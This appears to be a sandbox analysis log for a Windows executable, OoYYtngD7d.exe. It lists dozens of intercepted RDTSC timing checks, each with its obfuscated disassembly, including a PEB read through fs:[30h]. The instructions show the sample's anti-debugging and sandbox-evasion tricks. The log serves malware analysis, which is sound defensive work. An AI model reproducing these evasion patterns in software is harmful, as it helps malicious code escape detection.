Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E022C second address: 71E0232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0232 second address: 71E0236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0236 second address: 71E029D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d pushad 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 push ecx 0x00000013 movsx ebx, si 0x00000016 pop esi 0x00000017 popad 0x00000018 pop edi 0x00000019 jmp 00007FDD78DE46B5h 0x0000001e xchg eax, edi 0x0000001f jmp 00007FDD78DE46AEh 0x00000024 push eax 0x00000025 jmp 00007FDD78DE46ABh 0x0000002a xchg eax, edi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FDD78DE46B5h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E029D second address: 71E02AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD7915682Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E02AD second address: 71E02F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [eax] 0x0000000d jmp 00007FDD78DE46B6h 0x00000012 mov eax, dword ptr fs:[00000030h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDD78DE46B7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0373 second address: 71E03C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD7915682Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c mov dl, al 0x0000000e movsx edi, si 0x00000011 popad 0x00000012 test esi, esi 0x00000014 jmp 00007FDD79156838h 0x00000019 je 00007FDDE81B5B29h 0x0000001f jmp 00007FDD79156830h 0x00000024 sub eax, eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E03C2 second address: 71E03CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 48DF112Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E03CC second address: 71E03F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi], edi 0x0000000c pushad 0x0000000d mov ch, bl 0x0000000f mov di, si 0x00000012 popad 0x00000013 mov dword ptr [esi+04h], eax 0x00000016 jmp 00007FDD7915682Ah 0x0000001b mov dword ptr [esi+08h], eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov ax, FAA3h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E03F6 second address: 71E0423 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov bl, F4h 0x00000009 popad 0x0000000a mov dword ptr [esi+0Ch], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FDD78DE46B9h 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0423 second address: 71E0497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDD79156838h 0x00000008 pop esi 0x00000009 mov edx, 3192B8B6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [ebx+4Ch] 0x00000014 jmp 00007FDD7915682Dh 0x00000019 mov dword ptr [esi+10h], eax 0x0000001c jmp 00007FDD7915682Eh 0x00000021 mov eax, dword ptr [ebx+50h] 0x00000024 jmp 00007FDD79156830h 0x00000029 mov dword ptr [esi+14h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FDD79156837h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0497 second address: 71E049D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E049D second address: 71E04A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E04A1 second address: 71E04BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+54h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E04BA second address: 71E04BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E04BE second address: 71E0520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDD78DE46AEh 0x0000000b popad 0x0000000c mov dword ptr [esi+18h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FDD78DE46ADh 0x00000018 adc ch, 00000036h 0x0000001b jmp 00007FDD78DE46B1h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FDD78DE46B0h 0x00000027 xor eax, 73C4FD58h 0x0000002d jmp 00007FDD78DE46ABh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E061F second address: 71E068A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c jmp 00007FDD7915682Eh 0x00000011 mov ax, word ptr [ebx+6Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov bx, F7A0h 0x0000001c pushfd 0x0000001d jmp 00007FDD79156839h 0x00000022 sub ax, 0EA6h 0x00000027 jmp 00007FDD79156831h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E068A second address: 71E06D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov esi, edi 0x00000012 pushfd 0x00000013 jmp 00007FDD78DE46AFh 0x00000018 adc si, 7E8Eh 0x0000001d jmp 00007FDD78DE46B9h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E06D8 second address: 71E06E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD7915682Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E06E8 second address: 71E06EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E06EC second address: 71E0797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f jmp 00007FDD79156837h 0x00000014 mov word ptr [esi+32h], ax 0x00000018 jmp 00007FDD79156836h 0x0000001d mov eax, dword ptr [ebx+0000008Ch] 0x00000023 pushad 0x00000024 mov al, A1h 0x00000026 pushfd 0x00000027 jmp 00007FDD79156833h 0x0000002c sub ch, 0000005Eh 0x0000002f jmp 00007FDD79156839h 0x00000034 popfd 0x00000035 popad 0x00000036 mov dword ptr [esi+34h], eax 0x00000039 pushad 0x0000003a mov edi, esi 0x0000003c jmp 00007FDD79156838h 0x00000041 popad 0x00000042 mov eax, dword ptr [ebx+18h] 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FDD7915682Ah 0x0000004e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0797 second address: 71E079D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E079D second address: 71E07D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDD7915682Ch 0x00000009 adc ch, FFFFFFE8h 0x0000000c jmp 00007FDD7915682Bh 0x00000011 popfd 0x00000012 mov ebx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esi+38h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDD79156831h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E07D7 second address: 71E0819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c jmp 00007FDD78DE46AEh 0x00000011 mov dword ptr [esi+3Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FDD78DE46B7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0819 second address: 71E086B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDD7915682Fh 0x00000009 sbb cx, 079Eh 0x0000000e jmp 00007FDD79156839h 0x00000013 popfd 0x00000014 mov ah, C7h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+20h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDD79156836h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E086B second address: 71E08C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 pushfd 0x00000011 jmp 00007FDD78DE46B1h 0x00000016 sbb eax, 75C021E6h 0x0000001c jmp 00007FDD78DE46B1h 0x00000021 popfd 0x00000022 popad 0x00000023 lea eax, dword ptr [ebx+00000080h] 0x00000029 jmp 00007FDD78DE46AEh 0x0000002e push 00000001h 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E08C7 second address: 71E08FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDD79156833h 0x0000000a and cl, FFFFFFCEh 0x0000000d jmp 00007FDD79156839h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E08FD second address: 71E090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD78DE46ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E090D second address: 71E0911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E099F second address: 71E09A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E09A5 second address: 71E09A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E09A9 second address: 71E09C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E09C2 second address: 71E09C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E09C8 second address: 71E09CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E09CE second address: 71E09D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E09D2 second address: 71E0A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a jmp 00007FDD78DE46B0h 0x0000000f js 00007FDDE7E4337Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FDD78DE46B7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0A0B second address: 71E0A64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c pushad 0x0000000d call 00007FDD7915682Ch 0x00000012 jmp 00007FDD79156832h 0x00000017 pop esi 0x00000018 popad 0x00000019 mov dword ptr [esi+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDD79156833h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0A64 second address: 71E0ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FDD78DE46B5h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lea eax, dword ptr [ebx+78h] 0x00000011 jmp 00007FDD78DE46B7h 0x00000016 push 00000001h 0x00000018 jmp 00007FDD78DE46B6h 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0ABB second address: 71E0ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0ABF second address: 71E0AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0AC5 second address: 71E0B0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f pushfd 0x00000010 jmp 00007FDD79156838h 0x00000015 adc esi, 32A6D928h 0x0000001b jmp 00007FDD7915682Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0CE3 second address: 71E0CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0CE9 second address: 71E0D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD79156832h 0x00000008 call 00007FDD79156832h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 jmp 00007FDD7915682Eh 0x00000017 mov dword ptr [esp], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FDD7915682Dh 0x00000023 jmp 00007FDD7915682Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FDD79156838h 0x0000002f sbb ch, 00000028h 0x00000032 jmp 00007FDD7915682Bh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0D6C second address: 71E0D84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD78DE46B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0D84 second address: 71E0DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b jmp 00007FDD79156837h 0x00000010 nop 0x00000011 jmp 00007FDD79156836h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0DC4 second address: 71E0DE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0DE0 second address: 71E0DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0DE5 second address: 71E0DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 82h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov ecx, 0F8828CBh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0E64 second address: 71E0E68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0E68 second address: 71E0E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0E6E second address: 71E0F44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c pushad 0x0000000d mov si, 640Dh 0x00000011 mov edi, esi 0x00000013 popad 0x00000014 mov ecx, esi 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007FDD79156830h 0x0000001d call 00007FDD79156832h 0x00000022 pop ecx 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007FDD7915682Bh 0x0000002a sbb si, D41Eh 0x0000002f jmp 00007FDD79156839h 0x00000034 popfd 0x00000035 popad 0x00000036 mov dword ptr [esi+0Ch], eax 0x00000039 pushad 0x0000003a call 00007FDD7915682Ch 0x0000003f mov esi, 2371DC71h 0x00000044 pop esi 0x00000045 pushfd 0x00000046 jmp 00007FDD79156837h 0x0000004b and ax, CEDEh 0x00000050 jmp 00007FDD79156839h 0x00000055 popfd 0x00000056 popad 0x00000057 mov edx, 762C06ECh 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f mov edx, 4A66143Eh 0x00000064 mov si, di 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0F44 second address: 71E0F93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 706Dh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c sub eax, eax 0x0000000e pushad 0x0000000f mov si, bx 0x00000012 pushfd 0x00000013 jmp 00007FDD78DE46B1h 0x00000018 sbb cx, 2E76h 0x0000001d jmp 00007FDD78DE46B1h 0x00000022 popfd 0x00000023 popad 0x00000024 lock cmpxchg dword ptr [edx], ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FDD78DE46ADh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0F93 second address: 71E0FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD7915682Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0FA3 second address: 71E0FB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDD78DE46AAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0FB8 second address: 71E0FBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0FBE second address: 71E0FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0FC2 second address: 71E0FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0FC6 second address: 71E1016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov bx, 601Ah 0x0000000f pushad 0x00000010 jmp 00007FDD78DE46B1h 0x00000015 pushfd 0x00000016 jmp 00007FDD78DE46B0h 0x0000001b or cx, 5788h 0x00000020 jmp 00007FDD78DE46ABh 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 jne 00007FDDE7E42D77h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1016 second address: 71E101A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E101A second address: 71E1063 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FDD78DE46ACh 0x0000000d jmp 00007FDD78DE46B5h 0x00000012 popfd 0x00000013 popad 0x00000014 mov edx, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a call 00007FDD78DE46B3h 0x0000001f pop esi 0x00000020 mov ax, di 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1063 second address: 71E1069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1069 second address: 71E1079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1079 second address: 71E107F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E107F second address: 71E10AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDD78DE46B7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E10AA second address: 71E10D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E10D0 second address: 71E10D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E10D4 second address: 71E10DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E11EF second address: 71E1202 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 3EA34A81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+18h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1202 second address: 71E1206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E1206 second address: 71E121F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E121F second address: 71E1225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
